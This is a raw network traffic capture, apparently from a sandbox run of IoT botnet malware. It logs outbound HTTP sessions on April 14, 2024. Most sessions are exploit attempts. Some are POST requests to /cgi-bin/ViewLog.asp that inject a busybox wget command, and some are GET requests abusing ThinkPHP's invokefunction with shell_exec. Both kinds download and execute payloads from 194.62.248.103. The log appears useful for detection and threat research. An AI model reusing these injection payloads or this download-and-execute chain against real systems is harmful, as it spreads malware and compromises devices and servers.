                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        414192.168.2.233614231.44.132.1268080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:01.626049995 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        415192.168.2.2338940112.83.37.22380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:03.678390026 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:04.075217962 CEST135INHTTP/1.1 403 Forbidden
                                                        Server: uvlive/6.4.2 Rev15
                                                        Connection:close
                                                        Content-Length: 0
                                                        Access-Control-Allow-Origin: *


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        416192.168.2.2356936112.74.184.11480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:04.018081903 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:04.352346897 CEST490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:36:04 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
                                                        Apr 14, 2024 16:36:05.041332006 CEST490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Sun, 14 Apr 2024 14:36:04 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        417192.168.2.2353220112.74.166.24180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:04.021894932 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:04.352751970 CEST322INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:36:04 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        418192.168.2.2359932112.78.220.580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:04.036928892 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:04.501797915 CEST36INHTTP/1.0 404 Not Found
                                                        Apr 14, 2024 16:36:04.503810883 CEST14INData Raw: 0d 0a
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        419192.168.2.2359940112.78.220.580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:04.778763056 CEST47INHTTP/1.0 -1 Internal Server Error
                                                        Apr 14, 2024 16:36:04.782403946 CEST40INData Raw: 0d 0a 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 0d 0a
                                                        Data Ascii: HTTP/1.0 404 Not Found


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        420192.168.2.234155095.100.218.14980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:04.801631927 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:05.250349998 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:05 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:05 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 37 34 33 33 34 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 36 35 26 23 34 36 3b 31 30 30 61 37 37 32 30 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 32 37 34 33 33 34 31 37 26 23 34 36 3b 31 37 31 33 31 30 35 33 36 35 26 23 34 36 3b 31 30 30 61 37 37 32 30 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;27433417&#46;1713105365&#46;100a7720<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;27433417&#46;1713105365&#46;100a7720</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        421192.168.2.235775688.99.132.13180
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:05.559912920 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:05.862147093 CEST339INHTTP/1.1 400 Bad Request
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Sun, 14 Apr 2024 14:36:05 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        422192.168.2.235761488.221.141.8580
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:05.562797070 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:05.868244886 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:05 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:05 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 63 35 61 31 36 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 36 35 26 23 34 36 3b 31 33 32 30 34 65 33 61 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 32 63 35 61 31 36 30 32 26 23 34 36 3b 31 37 31 33 31 30 35 33 36 35 26 23 34 36 3b 31 33 32 30 34 65 33 61 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;2c5a1602&#46;1713105365&#46;13204e3a<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;2c5a1602&#46;1713105365&#46;13204e3a</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        423192.168.2.234030885.122.219.1808080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:05.867028952 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        424192.168.2.235229295.164.33.358080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:05.969737053 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:06.292464972 CEST59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        425192.168.2.234567285.85.0.118080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:05.979161024 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        426192.168.2.235894494.199.96.1218080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:05.981626034 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:06.299400091 CEST83INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        Transfer-Encoding: chunked


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        427192.168.2.233644631.136.45.2258080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:05.984942913 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:06.972405910 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:08.924160004 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:12.987622023 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:20.922348976 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:36.536307096 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:08.019891024 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        428192.168.2.235147862.29.48.2388080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:06.004889965 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        429192.168.2.234296631.200.114.748080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:06.013669968 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
